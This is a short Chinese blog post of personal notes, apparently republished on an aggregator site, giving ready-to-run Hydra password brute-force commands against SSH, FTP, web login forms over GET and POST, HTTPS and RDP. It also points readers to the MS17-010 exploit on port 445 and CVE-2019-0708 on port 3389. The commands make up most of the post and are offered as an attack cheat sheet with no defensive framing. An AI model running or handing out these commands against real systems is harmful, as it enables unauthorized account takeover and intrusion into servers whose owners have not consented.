zoukankan      html  css  js  c++  java

  • hydra 爆破笔记

    含有 ftp,ssh,mysql的端口可以丢进 hydra 爆破

    1、破解ssh: 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 


    2、破解ftp: 
    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 


    3、get方式提交,破解web登录: 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php


    4、post方式提交,破解web登录: 
    hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
    (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 


    5、破解https: 
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 


    6、破解rdp: 
    hydra ip rdp -l administrator -P pass.txt -V

    445端口可以MSF尝试一下 ms17-010
    3389端口可以尝试一下最新爆出的 CVE-2019-0708
    作者:求知鱼

    -------------------------------------------

    个性签名:你有一个苹果,我有一个苹果,我们交换一下,一人还是只有一个苹果;你有一种思想,我有一种思想,我们交换一下,一个人就有两种思想。

    如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!

    独学而无友,则孤陋而寡闻,开源、分享、白嫖!
  • 相关阅读:
    CSS3盒模型display初探(display:box/display:flex)
    css伪元素研究(::before/::after)
    css后代选择器(div.class中间不带空格)
    css选择器(选择<div>内所有<p>元素)
    text-indent无效解决方案
    控制div位于最上层
    gulp用途
    Webpack打包工具实时更新操作(启用观察者模式)
    CLR/.NET/C#/Visual Studio/ASP.NET各版本之间的关系(转)
    前端打包/自动化构建工具:fis3
  • 原文地址:https://www.cnblogs.com/Qiuzhiyu/p/12533380.html
Copyright © 2011-2022 走看看